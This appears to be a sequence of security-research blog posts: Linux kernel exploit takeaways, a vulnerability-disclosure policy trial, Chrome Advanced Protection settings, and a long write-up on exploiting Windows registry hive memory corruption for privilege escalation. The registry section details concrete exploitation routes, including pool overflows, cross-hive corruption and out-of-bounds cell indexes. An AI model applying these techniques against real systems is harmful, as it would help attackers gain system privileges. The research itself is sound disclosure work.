Somewhat relatedly, Blindside demonstrated that this style of attack can be pulled off without a normal arbitrary read primitive, by “exploiting” a real kernel memory corruption bug during speculative execution in order to leak information needed for subsequently exploiting the same memory corruption bug for real.
Takeaway: syzkaller fuzzing and complex data structures
The first memory corruption bug described in this post was introduced in late June 2024, and discovered by syzkaller in late August 2024. Hitting that bug required 6 syscalls: One to set up a socket pair, four send()/recv() calls to set up a dangling pointer, and one more recv() call to actually trigger UAF by accessing the dangling pointer.
Hitting the second memory corruption bug, which I found by code review, required 8 syscalls: One to set up a socket pair, six send()/recv() calls to set up a dangling pointer, and one more recv() to cause UAF.
This was not a racy bug; in a KASAN build, running the buggy syscall sequence once would be enough to get a kernel splat. But when a fuzzer chains together syscalls more or less at random, the chance of running the right sequence of syscalls drops exponentially with each syscall required...
The most important takeaway from this is that data structures with complex safety rules (in this case, rules about the ordering of different types of SKBs in the receive queues of UNIX domain stream sockets) don't just make it hard for human programmers to keep track of safety rules, they also make it hard for fuzzers to construct inputs that explore all relevant state patterns. This might be an area for fuzzer improvement - perhaps fuzzers could reach deeper into specific subsystems by generating samples that focus on interaction with a single kernel subsystem, or by monitoring whether additional syscalls chained to the end of a base sample cause additional activity in a particular subsystem.
Takeaway: copy_from_user() delays don't require FUSE or userfaultfd
FUSE and userfaultfd are the most effective and reliable ways to inject delays on copy_from_user() calls because they can set up separate delays for multiple memory regions, provide precise control over the timing of the injected delay, don't require large allocations or slow preparation, and allow placing arbitrary data in the page that is eventually installed. However, applying mprotect() to a large anonymous VMA filled with zeropage mappings (with 128 MiB of page tables) turns out to be sufficient to delay kernel execution by around a second. In the past, I have pushed for restricting userfaultfd because of how it can delay operations like copy_from_user(), but perhaps userfaultfd was not actually significantly more useful in this regard than mprotect().
Takeaway: Usercopy hardening
The hardening checks I encountered when calling copy_to_user() on arbitrary kernel addresses were a major annoyance, but could be worked around, since access to almost anything except type-specific SLUB pages is allowed. That said, I'm not sure how important improving these checks is - trying to protect against an attacker who can pass arbitrary kernel pointers to copy_to_user() might be futile, and guarding against out-of-bounds/use-after-free copy_to_user() or such is the major focus of this hardening.
Conclusions
Even in somewhat constrained environments, it is possible to pull off moderately complex Linux kernel exploits.
Chrome's Linux desktop renderer sandbox exposes kernel attack surface that is never legitimately used in the sandbox. This needless functionality doesn’t just allow attackers to exercise vulnerabilities they otherwise couldn’t; it also exposes kernel interfaces that are useful for exploitation, enabling heap grooming, delay injection and more. The Linux kernel contributes to this issue by exposing esoteric features through the same syscalls as commonly-used core kernel functionality. I hope to do a more in-depth analysis of Chrome's renderer sandbox on Linux in a follow-up blogpost.
In 2021, we updated our vulnerability disclosure policy to the current "90+30" model. Our goals were to drive faster yet thorough patch development, and improve patch adoption. While we’ve seen progress, a significant challenge remains: the time it takes for a fix to actually reach an end-user's device.
This delay, often called the "patch gap," is a complex problem. Many consider the patch gap to be the time between a fix being released for a security vulnerability and the user installing the relevant update. However, our work has highlighted a critical, earlier delay: the "upstream patch gap". This is the period where an upstream vendor has a fix available, but downstream dependents, who are ultimately responsible for shipping fixes to users, haven't yet integrated it into their end product.
As Project Zero's recent work has focused on foundational, upstream technologies like chipsets and their drivers, we've observed that this upstream gap significantly extends the vulnerability lifecycle.
For the end user, a vulnerability isn't fixed when a patch is released from Vendor A to Vendor B; it's only fixed when they download the update and install it on their device. To shorten that entire chain, we need to address the upstream delay.
To address this, we're announcing a new trial policy: Reporting Transparency.
The Trial: Reporting Transparency
Our core 90-day disclosure deadline will remain in effect. However, we're adding a new step at the beginning of the process.
Beginning today, within approximately one week of reporting a vulnerability to a vendor, we will publicly share that a vulnerability was discovered. We will share:
The vendor or open-source project that received the report.
The affected product.
The date the report was filed, and when the 90-day disclosure deadline expires.
This trial maintains our existing 90+30 policy, meaning vendors still have 90 days to fix a bug before it is disclosed, with a 30-day period for patch adoption if the bug is fixed before the deadline.
Google Big Sleep, a collaboration between Google DeepMind and Google Project Zero, will also be trialling this policy for their vulnerability reports. The issue tracker for Google Big Sleep is at goo.gle/bigsleep.
Why the Change? Increased Transparency to Close the Gap
The primary goal of this trial is to shrink the upstream patch gap by increasing transparency. By providing an early signal that a vulnerability has been reported upstream, we can better inform downstream dependents. For our small set of issues, they will have an additional source of information to monitor for issues that may affect their users.
We hope that this trial will encourage the creation of stronger communication channels between upstream vendors and downstream dependents relating to security, leading to faster patches and improved patch adoption for end users.
This data will make it easier for researchers and the public to track how long it takes for a fix to travel from the initial report, all the way to a user's device (which is especially important if the fix never arrives!)
Will this help attackers?
We don't believe so. While we anticipate that in the initial phase of this trial there may be increased public attention on unfixed bugs, we want to be clear: no technical details, proof-of-concept code, or information that we believe would materially assist discovery will be released until the deadline. Reporting Transparency is an alert, not a blueprint for attackers.
We understand that for some vendors without a downstream ecosystem, this policy may create unwelcome noise and attention for vulnerabilities that only they can address. However, these vendors now represent the minority of vulnerabilities reported by Project Zero. We believe the benefits of a fair, simple, consistent and transparent policy outweigh the risk of inconvenience to a small number of vendors.
That said, in 2025, we hope that the industry consensus is that the mere existence of vulnerabilities in software is neither surprising nor alarming. End users are more aware of the importance of security updates than ever before. It's widely accepted as fact that any system of moderate complexity will have vulnerabilities, and systems that were considered impenetrable in the past have been shown to be vulnerable in retrospect.
This is a trial, and we will be closely monitoring its effects. We hope it achieves our ultimate goal: a safer ecosystem where vulnerabilities are remediated not just in an upstream code repository, but on the devices, systems and services that people use every day. We look forward to sharing our findings and continuing to evolve our policies to meet the challenges of the ever-changing security landscape.
Posted by David Adrian, Javier Castro & Peter Kotwicz, Chrome Security Team
Android recently announced Advanced Protection, which extends Google’s Advanced Protection Program to a device-level security setting for Android users that need heightened security—such as journalists, elected officials, and public figures. Advanced Protection gives you the ability to activate Google’s strongest security for mobile devices, providing greater peace of mind that you’re better protected against the most sophisticated threats.
Advanced Protection acts as a single control point for at-risk users on Android that enables important security settings across applications, including many of your favorite Google apps, such as Chrome. In this post, we'd like to do a deep dive into the Chrome features that are integrated with Advanced Protection, and how enterprises and users outside of Advanced Protection can leverage them.
Android Advanced Protection integrates with Chrome on Android in three main ways:
Enables the “Always Use Secure Connections” setting for both public and private sites, so that users are protected from attackers reading confidential data or injecting malicious content into insecure plaintext HTTP connections. Insecure HTTP represents less than 1% of page loads for Chrome on Android.
Enables full Site Isolation on mobile devices with 4GB+ RAM, so that potentially malicious sites are never loaded in the same process as legitimate websites. Desktop Chrome clients already have full Site Isolation.
Reduces attack surface by disabling the higher-level optimizing JavaScript compilers, so that Chrome is harder to exploit.
Let’s take a look at all three, learn what they do, and how they can be controlled outside of Advanced Protection.
Always Use Secure Connections
“Always Use Secure Connections” (also known as HTTPS-First Mode in blog posts and HTTPS-Only Mode in the enterprise policy) is a Chrome setting that forces HTTPS wherever possible, and asks for explicit permission from you before connecting to a site insecurely. There may be attackers attempting to interpose on connections on any network, whether that network is a coffee shop, airport, or an Internet backbone. This setting protects users from these attackers reading confidential data and injecting malicious content into otherwise innocuous webpages. This is particularly useful for Advanced Protection users, since in 2023, plaintext HTTP was used as an exploitation vector during the Egyptian election.
Beyond Advanced Protection, we previously posted about how our goal is to eventually enable “Always Use Secure Connections” by default for all Chrome users. As we work towards this goal, in the last two years we have quietly been enabling it in more places beyond Advanced Protection, to help protect more users in risky situations, while limiting the number of warnings users might click through:
We added a new variant of the setting that only warns on public sites, and doesn’t warn on local networks or single-label hostnames (e.g. 192.168.0.1, shortlink/, 10.0.0.1). These names often cannot be issued a publicly-trusted HTTPS certificate. This variant protects against most threats—accessing a public website insecurely—but still allows for users to access local sites, which may be on a more trusted network, without seeing a warning.
We’ve automatically enabled “Always Use Secure Connections” for public sites in Incognito Mode for the last year, since Chrome 127 in June 2024.
We automatically prevent downgrades from HTTPS to plaintext HTTP on sites that Chrome knows you typically access over HTTPS (a heuristic version of the HSTS header), since Chrome 133 in January 2025.
Always Use Secure Connections has two modes—warn on insecure public sites, and warn on any insecure site.
Any user can enable "Always Use Secure Connections" in the Chrome Privacy and Security settings, regardless of whether they're using Advanced Protection. Users can choose if they would like to warn on any insecure site, or only insecure public sites. Enterprises can opt their fleet into either mode, and set exceptions, using the HTTPSOnlyMode and HTTPAllowlist policies, respectively. Website operators should protect their users' confidentiality, ensure their content is delivered exactly as they intended, and avoid warnings, by deploying HTTPS.
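For example, a managed deployment could force the strict mode fleet-wide while carving out an internal device that cannot obtain a publicly-trusted certificate (the policy names are real; the allowlisted hosts below are hypothetical):

```json
{
  "HTTPSOnlyMode": "force_enabled",
  "HTTPAllowlist": ["printer.internal.example", "10.0.0.1"]
}
```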
Full Site Isolation
Site Isolation is a security feature in Chrome that isolates each website into its own rendering OS process. This means that different websites, even if loaded in a single tab of the same browser window, are kept completely separate from each other in memory. This isolation prevents a malicious website from accessing data or code from another website, even if that malicious website manages to exploit a vulnerability in Chrome’s renderer—a second bug to escape the renderer sandbox is required to access other sites. Site isolation improves security, but requires extra memory to have one process per site. Chrome Desktop isolates all sites by default. However, Android is particularly sensitive to memory usage, so for mobile Android form factors, when Advanced Protection is off, Chrome will only isolate a site if a user logs into that site, or if the user submits a form on that site. On Android devices with 4GB+ RAM in Advanced Protection (and on all desktop clients), Chrome will isolate all sites. Full Site Isolation significantly reduces the risk of cross-site data leakage for Advanced Protection users.
JavaScript Optimizations and Security
Advanced Protection reduces the attack surface of Chrome by disabling the higher-level optimizing JavaScript compilers inside V8, Chrome’s high-performance JavaScript and WebAssembly engine. The optimizing compilers in V8 make certain websites run faster, but they have historically also been a source of exploited Chrome vulnerabilities. Of all the patched security bugs in V8 with known exploitation, disabling the optimizers would have mitigated ~50%. At the same time, the optimizers are why Chrome scores the highest on industry-wide benchmarks such as Speedometer. Disabling the optimizers blocks a large class of exploits, at the cost of causing performance issues for some websites.
Disabling these optimizing compilers is not limited to Advanced Protection. Since Chrome 133, the “JavaScript optimization & security” Site Setting has allowed users to enable or disable the higher-level optimizing compilers on a per-site basis, as well as change the default.
Settings -> Privacy and security -> JavaScript optimization and security
This setting can be controlled by the DefaultJavaScriptOptimizerSetting enterprise policy, alongside JavaScriptOptimizerAllowedForSites and JavaScriptOptimizerBlockedForSites for managing the allowlist and denylist. Enterprises can use this policy to block access to the optimizers by default, while still allowlisting1 the SaaS vendors their employees use on a daily basis. It’s available on Android and desktop platforms.
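As a sketch of how an enterprise might combine these policies (the policy names are the ones named above; the value 2 is assumed to mean "block the optimizers by default", and the site pattern is a hypothetical placeholder, so both should be verified against the Chrome Enterprise policy reference):

```json
{
  "DefaultJavaScriptOptimizerSetting": 2,
  "JavaScriptOptimizerAllowedForSites": ["[*.]trusted-saas-vendor.example"]
}
```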
Chrome aims for the default configuration to be secure for all its users, and we’re continuing to raise the bar for V8 security in the default configuration by rolling out the V8 sandbox.
Protecting All Users
Billions of people use Chrome and Android, and not all of them have the same risk profile. Less sophisticated attacks by commodity malware can be very lucrative for attackers when done at scale, but so can sophisticated attacks on targeted users. This means that we cannot expect the security tradeoffs we make for the default configuration of Chrome to be suitable for everyone.
Advanced Protection, and the security settings associated with it, are a way for users with varying risk profiles to tailor Chrome to their security needs, whether as an individual at-risk user or as an organization: enterprises with a fleet of managed Chrome installations can also enable the underlying settings now. Advanced Protection is available on Android 16 in Chrome 137+.
We additionally recommend at-risk users join the Advanced Protection Program with their Google accounts, which will require the account to use phishing-resistant multi-factor authentication methods and enable Advanced Protection on any of the user’s Android devices. We also recommend users enable automatic updates and always keep their Android phones and web browsers up to date.
Notes
Allowlisting only works on platforms capable of full site isolation—any desktop platform and Android devices with 2GB+ RAM. This is because internally allowlisting is dependent on origin isolation. ↩
In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail.
Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows):
and temporal violations, such as use-after-free conditions:
In this write-up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 in a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement to and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.
Where to start: high-level overview of potential options
Let's start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn't pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation.
The exploitation of classic memory corruption bugs typically involves the following steps:
Initial memory corruption primitive
???
???
???
Profit (in the form of arbitrary code execution, privilege escalation, etc.)
The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance:
In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation:
Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.
Intra-hive corruption
Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.
Performing hive-only attacks in privileged system hives
To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting. If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met:
The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.
The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug.
Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell").
Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this:
To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.
The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.
There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation.
To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should be ultimately able to obtain a list of potential keys that can be used to corrupt a system hive.
Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include:
As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind.
Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn't been fixed so far. This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to:
Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.
Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user's permissions.
Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario.
As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security.
In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.
Abusing regf inconsistency to trigger kernel pool corruption
While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures.
For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.
However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur.
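The overflow condition above can be modeled in a few lines. This is an illustrative sketch of the size mismatch, not kernel code; the 16344-byte usable chunk size (16 KiB minus bookkeeping) is taken from the text:

```python
CHUNK_DATA = 16344  # usable bytes per "big data" chunk, per the text above

def big_data_overflow(data_length: int, chunk_count: int) -> bool:
    """Model of the CmpGetValueData inconsistency: the pool buffer is sized
    from _CM_KEY_VALUE.DataLength, but the copy loop is driven by
    _CM_BIG_DATA.Count. Returns True if the copy overruns the buffer."""
    buffer_size = data_length
    # At least (chunk_count - 1) full chunks are copied before the final,
    # possibly partial one, so the buffer is overrun whenever:
    return buffer_size < CHUNK_DATA * (chunk_count - 1)

# A value honestly described by 2 chunks needs DataLength > 16344;
# shrinking DataLength below that turns the copy into a pool overflow.
assert big_data_overflow(data_length=0x1000, chunk_count=2)
assert not big_data_overflow(data_length=20000, chunk_count=2)
```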
This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.
Inter-hive memory corruption
So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.
Other hive mappings in the user space of the Registry process
Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below.
In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them.
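To double-check the address arithmetic, the !vad columns can be converted back to byte addresses by multiplying by the 4 KiB page size (a small sketch; the page numbers are the ones from the listing above and will differ on any other system):

```python
PAGE = 0x1000  # 4 KiB page size

def vad_range(start_page: int, end_page: int) -> tuple:
    """Convert !vad's page-granular Start/End columns to byte addresses."""
    return (start_page * PAGE, end_page * PAGE + (PAGE - 1))

# The SAM hive mapping from the listing above:
assert vad_range(0x152e7a20, 0x152e7a2f) == (0x152e7a20000, 0x152e7a2ffff)
# The DEFAULT hive mapping directly after it:
assert vad_range(0x152e7a30, 0x152e7b2f) == (0x152e7a30000, 0x152e7b2ffff)
```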
However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory.
For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key.This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout:
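The bin-size arithmetic above can be sanity-checked directly (the 0x20-byte _HBIN header, 4-byte cell size field, and 4 bytes of padding are as described in the text):

```python
HBIN_HEADER = 0x20   # sizeof(_HBIN)
CELL_HEADER = 4      # 32-bit cell size field
PADDING = 4
VALUE_DATA = 0x3FD8  # payload written per value by the test program

bin_size = VALUE_DATA + HBIN_HEADER + CELL_HEADER + PADDING
assert bin_size == 0x4000            # each value allocates one new 16 KiB bin
assert 0x200000 // bin_size == 128   # a 2 MiB mapping holds 128 such bins
```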
What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 128 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result:
We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other.
After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.
Attacking adjacent memory in pool-based hive mappings
Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows:
All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.
The entire HKLM\SYSTEM hive, including both its stable and volatile parts.
All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.
Volatile storage space of every active hive in the system.
The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below:
This behavior can be further verified on a specific example. Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command:
As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let's try to find the second page of this hive region in memory by translating its corresponding cell index:
Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk'). Now, let's see what the !pool command tells us about this address:
The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.
The ultimate primitive: out-of-bounds cell indexes
The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes.
As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table:
The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below:
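The original pseudocode listing is not reproduced here, but the decomposition it performs can be modeled in Python, based on the cell map layout described in this post (1-bit storage type, 10-bit directory index, 9-bit table index, 12-bit cell offset). This is a sketch of the index split, not the kernel's code:

```python
def decompose_cell_index(index: int) -> dict:
    """Split a 32-bit cell index into the four components walked by
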